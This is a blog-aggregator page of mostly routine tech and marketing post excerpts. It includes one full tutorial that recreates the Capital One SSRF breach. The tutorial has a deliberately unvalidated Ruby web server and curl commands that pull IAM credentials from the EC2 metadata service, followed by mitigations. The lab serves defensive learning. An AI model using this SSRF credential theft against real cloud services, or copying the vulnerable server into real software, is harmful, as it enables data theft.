decor
 

Planet Big Data logo

Planet Big Data is an aggregator of blogs about big data, Hadoop, and related topics. We include posts by bloggers worldwide. Email us to have your blog included.

 

August 23, 2019


Forrester Blogs

VMware Signals The End Of “Endpoint” Detection And Response

The acquisition of Carbon Black by VMware was a bit of a surprise to me, but once put into perspective it makes sense. First, a few observations from a value perspective. Carbon Black brings a strong...

...

Forrester Blogs

Channel Marketers Need To Become Community Marketers – Here’s How

<Click Image for Full Size>   A lot has changed in the 25+ years I have spent in the technology channel. New technologies, partner business models, shifting demographics, expanding...

...

Forrester Blogs

Collective Bargaining: Your Biggest Risk In The Age Of The Customer

Social media has created customer groups that coalesce around a brand — in effect, a union. They collectively can and will change your corporate policy. With collective bargaining, business as usual...

...

Forrester Blogs

VMware Welcomes Estranged Sibling Pivotal Back Home

On August 22, 2019, VMware announced that it will acquire sister company Pivotal Software, vendor of a widely used cloud development platform, Pivotal Cloud Foundry. The transaction is a...

...

Simplified Analytics

Register for our Digital Marketing Workshop

Running your own business comes with a lot of challenges. Digital Marketing does not need to be one of them. Our workshop will give you practical approaches with automation tools and more than 6...

...
 

August 22, 2019


Forrester Blogs

Digitally Evolving Customer Mindsets Will Reshape India’s Financial Services Landscape

Indian financial services customers are changing! Forrester surveyed 3,000 online adults in India about their attitudes about, expectations of, and preferences for financial services and found that...

...

Forrester Blogs

The State Of Influencer Marketing: Growing

For all the dramatic headlines about influencers, our research states that they’re capturing steadily larger proportions of marketing budget. For our latest report, we interviewed more than 30...

...

Forrester Blogs

Become An Adaptive Thinker: Flex Between Divergence And Convergence

Every business runs on thinking, mostly in two modes: divergent and convergent. I’ve been researching this, and I just published my findings in a new report to help individuals, teams, and...

...
InData Labs

What Computer Vision Is and What It Gives Technology-Led Industries

Computer vision is a subsection of artificial intelligence (AI) that is on the rise. Its focus is on developing and refining techniques that let machines see and understand digital images and video content. Today, we live in a reality awash in visual information. According to HubSpot, 54% of consumers want their favorite brands to deliver...

Запись What Computer Vision Is and What It Gives Technology-Led Industries впервые появилась InData Labs.

 

August 21, 2019


Forrester Blogs

US Tech Spending Slowdown Amid Rising Cloud Adoption Will Squeeze Tech Budgets

Recent stock and bond market turmoil has highlighted the growing risk of a US economic slowdown and even a recession — a prospect that 74% of economists think will happen by 2021, according to a...

...
Cloud Avenue Hadoop Tips

How the Capital One hack was achieved in the AWS Cloud?

DISCLOSURE : The intention of this blog is NOT to help others hack, but to make sure they can secure their applications built on top of AWS or some other Cloud. A few mitigations to fix the SSRF vulnerability and others have been mentioned towards the end of the blog.

Introduction

Capital One hosted their Services on AWS and it was hacked (1, 2, 3). Data was downloaded from AWS S3. It's a feature in AWS which was exploited and a misconfiguration done by the Capital One which caused the hack by an ex-AWS employee. The information about the hack was every where in the news, but it was all in bits and pieces. It took me some time to recreate the hack on my own AWS Account. This blog is about the sequence of steps to recreate the same hack using and in your AWS account.

I came across the SSRF vulnerability recently, but looks like it had been there for ages, still the different organizations using the AWS Cloud didn't patch the vulnerability. The hacker was able to get the data from 30 different organizations. Hope this documentation will help a few to fix the hole in some applications and also to design/build secure applications.

Here I am going with the assumption that the readers are familiar with the different AWS concepts like EC2, Security Group, WAF and IAM. And also that they have an account with AWS. The AWS free tier should be good enough to try the steps.


Steps to recreate the Capital One hack

Step 1: Create a Security Group - Open Port 80 for HTTP and Port 22 for SSH. Open it for MyIP using the Source IP.

Step 2: Create an Ubuntu EC2 instance of t2.micro and login via Putty. Attach the above Security Group to the Ubuntu EC2 Instance.

Step 3: Create an IAM role (Role4EC2-S3RO) with AmazonS3ReadOnlyAccess policy and assign the policy to the above Ubuntu EC2 instance. Attach a policy with very limited privileges like S3 RO or something else, behind which there is no critical data.

Step 4: Test the below curl command in the Ubuntu EC2 Instance to get the IAM Role credentials via EC2 Metadata Service.

curl http://169.254.169.254/latest/meta-data/iam/security-credentials/Role4EC2-S3RO

Step 5: Install Ruby and Sinatra on the Ubuntu EC2 instance. The last command will takes a few minutes for execution.

sudo apt-get update
sudo apt-get install ruby
sudo gem install sinatra

Step 6: Create server.rb file with the below content on the Ubuntu EC2 instance. This will create a webserver. The server takes a URL as input, opens the same and sends the URL content as the output to the browser. The input URL is never validated in the below code, so we should be able to get to an internal network URL also, so was the hack.

require 'sinatra'
require 'open-uri'

get '/' do
  format 'RESPONSE: %s', open(params[:url]).read
end

The above program goes in an infinite loop. So, another Putty session has to be opened to execute the below commands.

Step 7: Get the Private IP of the Ubuntu EC2, use the same in the below command and execute it in Ubuntu EC2 instance. This will start the webserver using the above Ruby program.

sudo ruby server.rb -o 1.2.3.4 -p 80

Step 8: Run the below command in Ubuntu EC2 Instance. Make sure to replace the 5.6.7.8 with the Public IP of the Ubuntu EC2 instance. The server.rb will call google.com and return the response.

curl http://5.6.7.8:80/\?url\=https://www.google.com/

Now, run the below command. Make sure to replace the 5.6.7.8 with the Public IP of the Ubuntu EC2 instance. Notice the Security Credentials of the role attached to the Ubuntu EC2 Instance are displayed as the response to the below command.

curl http://5.6.7.8:80/\?url\=http://169.254.169.254/latest/meta-data/iam/security-credentials/Role4EC2-S3RO

Step 9: Open the below URL in a browser from your machine, to get the Security Credentials of the IAM Role displayed in the browser.  Make sure to replace the 5.6.7.8 with the Public IP of the Ubuntu EC2 instance.

http://5.6.7.8:80?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/Role4EC2-S3RO

This is how the Capital One and other organizations got hacked via the SSRF vulnerability. Once the Hacker got the Security Credentials via the browser, it's all about using the AWS CLI or SDK to get the data from S3 or somewhere else based on the Policy attached to the IAM Role.

Many times websites ask us to enter our LinkedIn Profile URL or Twitter URL, call the same and get more information about us. The same can be exploited to invoke any other URL to get the details behind the firewall, if the security is not configured properly. In the above command a call is made to the 169.254.169.254 (Internal Network IP) for getting the Credentials via the EC2 Metadata Service.

Step 10: Make sure to terminate the EC2 and delete the role.

Mitigations around the SSRF

Any one of the below steps would have stopped the Capital One Hack or any other.

1. Application code review for the SSRF attacks and perform proper validation of the inputs.

2. Adding a WAF rule to detect "169.254.169.254" string and block the request to reach the EC2 as shown in the diagram at the begning of the blog.

3. Make changes the Ubuntu EC2 Instance to block the calls to 169.254.169.254.
iptables -A OUTPUT -m owner ! --uid-owner root -d 169.254.169.254 -j DROP

4. Use services like AWS Macie to detect any anomalies in the data access pattern and take a preventive action. There are many 3rd party services when integrated with S3, will identify and anomaly in the S3 access patterns and notify us. I haven't worked on such tools.

5. In the case of Captial One, not sure if the EC2 required the AmazonS3ReadOnlyAccess, but it's always better to give the minimum privileges required to any resource.

Conclusion

AWS claims that their systems were secure and that it is do with the misconfiguration of the AWS WAF by Capital One and a few other like giving excessive permissions to EC2 via IAM role. I agree with it, but AWS should also not have left the EC2 metadata service wide open to anyone with access to EC2. Not sure how AWS would fix it, any changes to the EC2metadata interface would break the existing applications using the EC2 metadata service interface. The letter from AWS to US Senator Wyden on this incident is an interesting read.

To blame AWS or Capital One, at the end the customers of the 30 different organizations have to suffer.

References

Retrieving the Role Security Credentials via EC2 Metadata

EC2s most dangerous feature

What is Sinatra?

What is SSRF and code for the same

On Capital One from Krebs (1, 2)

On Capital One From Evan (1)

Technical analysis of the hack by CloudSploit

WAF FAQ

Forrester Blogs

Why Chatbots Can’t Read Your Mind

Chatbots — And Why They Can’t Read Your Mind Chatbots are cropping up everywhere, from customer service to internal help desks, but what makes them tick? When we interact with chatbots, we’re often...

...

Forrester Blogs

Maintain Your Security Edge: Develop And Retain Cybersecurity Talent

As an industry, we gripe about hiring and struggle with retention. My colleagues Jeff, Chase, and JB have written about how the cybersecurity staffing shortage is predominantly self-inflicted in...

...

Forrester Blogs

Data Scientists Aren’t Just About The Numbers — And Other Lessons From IDEO About The Collision Between Design And Data Science

As part of my research about data science and design, I spoke with Ovetta Sampson, design research lead at IDEO, a global design company. Sampson’s advice that stood out most to me about how to...

...

Forrester Blogs

Product Teams For Infrastructure And Operations

As an analyst at Forrester, I talk to a lot of IT professionals. One of the most common inquiries lately goes something like this: “We’ve piloted DevOps and Agile and like the results....

...
 

August 20, 2019


Forrester Blogs

The Importance Of Defining Event ROI In The B2B Marketing Mix

“If a tree falls in a forest and no one is around to hear it, does it make a sound?” This question, first attributed to philosopher George Berkeley in 1710, raises debates about...

...
 

August 19, 2019


Forrester Blogs

CX SF 2019: Don’t Claim A Good CX Until Customers Say They’ve Succeeded

Shortly after I joined Forrester’s customer experience (CX) research team, I took a trip out to San Francisco to visit with some of my old friends and contacts in the tech industry. While there, I...

...

Forrester Blogs

FORRward: A Weekly Read For Tech And Marketing Execs

The Great Gender Blur And Its Impact On The Future Of Marketing Marketing stands at the threshold of a monumental cultural shift — the great gender blur. The male-female binary and all its associated...

...

Forrester Blogs

The Future Of Retail: From Store To Stage

Did you know that 90 former Toys R Us big-box stores are now Urban Air Adventure Parks? Here at Forrester, we’ve been anticipating that retail, entertainment, and hospitality would ultimately...

...

Forrester Blogs

Reflections On Bosch ConnectedWorld 2019

Bosch ConnectedWorld — Bosch’s premier customer and partner event held annually in Berlin — has become a destination event for European internet of things (IoT) professionals.

...

Antonio Cangiano

Join My Team at IBM

This is a heads up that my team has several developer positions available. The job post is not live yet, but it will be shortly. If you are interested and you meet the requirements below, feel free...

...
 

August 16, 2019


Forrester Blogs

Revlon’s Cautionary Tale: The Changing Nature Of Influencer Marketing

A Giant In Trouble: Revlon Considers A Sale Cosmetic giant Revlon is exploring the sale of all or some of its business amid lackluster sales and a crushing debt of $3 billion. The iconic...

...

Forrester Blogs

The Insights Beat: The Times They Are A-Changin’

Come gather ’round, people, wherever you roam And admit that the waters around you have grown And accept it that soon you’ll be drenched to the bone If your time to you is worth...

...

Simplified Analytics

Are you struggling to make the most from smaller digital marketing budget?

Register for a small investment of Rs 3540 including taxes and ensure you can reach most of your audience. http://meudyojak.com/portfolio/digital-marketing-workshop/ #GoingDigital #DigitalStrategy...

...
 

August 15, 2019


Forrester Blogs

Introducing Autonomous Finance: Forrester’s New Research On Algorithm-Based Financial Services

People’s lives are becoming ever more automated as millions of algorithms make decisions — and, in some cases, take actions on those decisions — on behalf of a consumer. While it’s still early days,...

...
 

August 14, 2019


Forrester Blogs

The Future Of Insurance

Given the pace of social change and technological innovation, the future of insurance is very interesting! We recently published research on the future of insurance in which we offer perspectives on...

...
 

August 13, 2019


Forrester Blogs

Data Science And Design Collide — There’s A Better Way

Last August, a tweet from a data scientist reminding colleagues to get out of tables of data and talk to real people — you know, do qualitative research — went viral among these two constituencies....

...

Forrester Blogs

Rated H For Headless (Is Headless CMS For Mature Audiences Only?)

My colleague Joe Cicman just published a new report (“The New Commerce Revolution: Off With Their Heads (Or Not!“) to help de-hype headless commerce. Much of that work is also very...

...

Forrester Blogs

Headless Commerce And The Horseless Carriage

As with any high-consideration purchase, there’s an expectation of a bedside manner. Buying an eCommerce platform is no exception. But all too often, I hear it feels a lot like this doctor’s visit ....

...

Forrester Blogs

Build Your Next-Generation Business Case Using A Lifecycle

So you’ve got a great new idea for how technology-driven innovations can transform your business, reinvent the way employees work, and/or drive customer obsession. That’s a great start!...

...

Forrester Blogs

Digital Business: Bosch ConnectedWorld 2019 Analysis

Bosch ConnectedWorld — Bosch’s premier customer and partner event held annually in Berlin — has become a destination event for European internet of things (IoT) professionals. What started several...

...

Forrester Blogs

Embed AI In Your Digital Supply Chain To Win, Serve, And Retain Customers

It’s now just over 12 months since we first published research on digital supply chains. Some Forrester clients have made progress with integrated business planning and with control towers. And they...

...

Simplified Analytics

How To Exploit Digital Marketing For Your Business

1. Do you feel #digitalmarketing is an integral part of your Marketing?2. Do you face challenges in keeping in touch with your existing customers and prospects?3. Do you feel...

...
 

August 12, 2019


Forrester Blogs

CX SF 2019: Dark Patterns Hurt Customers And The Companies That Use Them — When The Dark Side Calls, How Will You Answer?

Growth hacking. Chief growth officer. Conversion rate optimization. Engagement. All terms and titles that highlight the interests of the company over the interests of its customers. Is it any wonder,...

...

Revolution Analytics

AI, Machine Learning and Data Science Roundup: July/August 2019

A mostly monthly roundup of news about Artificial Intelligence, Machine Learning and Data Science. This is an eclectic collection of interesting blog posts, software announcements and data...

...

Forrester Blogs

FORRward: A Weekly Read For Tech And Marketing Execs

Salesforce Crosses The Physical-Digital Divide With ClickSoftware Acquisition Salesforce signed a definitive agreement to acquire Israeli field service software firm ClickSoftware for approximately...

...
 

August 09, 2019


SoftBase

SoftBase attending Regional Db2 Users Group meetings in September, 2019

SoftBase will be represented at these Regional Db2 Users Group meetings: St. Louis (STLDUG), September 10, 2019 Wisconsin (WDUG), September 11, 2019 Midwest (MWDUG), September 19, 2019

...

Forrester Blogs

Business Gets Personal: Why Executives Cannot Decouple Individual Values From Company Values

Consumers have been assessing companies’ political and social affiliations for years. Now, executives’ personal values are critical to the assessment.

...

Forrester Blogs

Broadcom Buys Symantec’s Enterprise Biz: Good News For Investors, Bad News For Enterprises

Yesterday, Broadcom announced a definitive deal to acquire the enterprise business of Symantec for $10.7 billion in cash. This deal caps weeks of speculation that Symantec was in play, initiated in...

...

Forrester Blogs

Salesforce Buys ClickSoftware To Bolster Its Field Service Offering

Salesforce continues its fast and furious acquisition spree by picking up ClickSoftware for $1.53 billion to beef up its field service capabilities. Field service is a rapidly growing area in CRM....

...
 

August 08, 2019


Forrester Blogs

Use Forrester’s Customer Service Wave™ To Guide Your Product Selection

Not all customer service vendor solutions are a good fit for your organization, and choosing the right one depends on the number of agents you have, your growth projections, your business model, the...

...

Forrester Blogs

Laud Your Whistleblowers Or Pay The Price

Companies that don’t take ethical behavior seriously face lasting brand damage, fines, and years of enforcement actions with ongoing lawsuits. However, companies that operate at a high moral and...

...

Forrester Blogs

Last-Mile Delivery: eCommerce’s Future Depends On Innovation In Package Delivery

15 billion — that’s how many eCommerce orders were delivered last year to customers in the US. Not only are the costs of these shipments increasing, but many of those deliveries are inefficient and...

...

Forrester Blogs

European Digital Advertising Gets Knocked Down But Gets Back Up Again (Kind Of)

European digital advertising has had a challenging year thanks to GDPR, EU fines, and social media scandals. Growth in digital advertising spending is decelerating, and adtech providers are...

...

Forrester Blogs

Customer Effort: How To Measure It Right

How do you measure customer effort? Most customer experience (CX) pros use surveys. While the question text and scale they use can differ, the resulting score measures the level of effort. But we...

...

Forrester Blogs

Translating Security For Small Business

This week is Black Hat — the annual Hacker Summer Camp, as many folks call it. And this year is the first year in 14 years I haven’t been there. This year, I intentionally took an opportunity...

...

Forrester Blogs

Zero Trust In Action

Watch this video to see what happens when a threat attacks a Zero Trust environment compared to a perimeter-based one.

...
 

August 07, 2019


Forrester Blogs

Infrastructure Automation Platforms: Coopetition At Its Fiercest

Why Infrastructure Automation? I used to kid around with my research director, Glenn O’Donnell, that my previous Forrester Wave™ evaluation on configuration management was the “Wave no...

...

Forrester Blogs

Asia Pacific Financial Consumers’ Digital Coming Of Age Is Here — Is Your Firm Ready?

Something remarkable is happening with Asia Pacific online adults: Their behaviors and expectations are evolving at an unprecedented rate, and they’re embracing innovation faster than ever before....

...
 

August 06, 2019


Forrester Blogs

Insights, Analytics, And The Myth Of The Magician’s Reveal

When it comes to kicking off (or growing) an analytics initiative, there’s an obstacle right out of the gate. It’s building the business case — the effort of persuading budget holders and other...

...

Forrester Blogs

Security & Risk 2019: Cybersecurity’s Staffing Shortage Is Self-Inflicted

Unless this is your first day working in cybersecurity, you’ve heard numerous times that we have a hiring crisis — there aren’t enough people to fill the need for security talent. Current projections...

...
InData Labs

InData Labs at Imaguru Data Challenge, Datathon 2019

Two weeks back, 19-21 of July, our team took part in the 3rd Datathon, Imaguru Practical Data Challenge. The competition was held with the support of the US Agency for International Development, USAID, in Belarus. Over the three days, 12 teams consisting of 120 participants worked hard to nail the tasks by Datathon partner companies:...

Запись InData Labs at Imaguru Data Challenge, Datathon 2019 впервые появилась InData Labs.


Forrester Blogs

Data Literacy Matters — Do We Have To Spell It Out?!

In the words of Thomas Edison, the value of an idea lies in the using of it. Yeah, I’ve used that quote a lot to talk about the value of data. Data isn’t inherently valuable. But when you use it to...

...
decor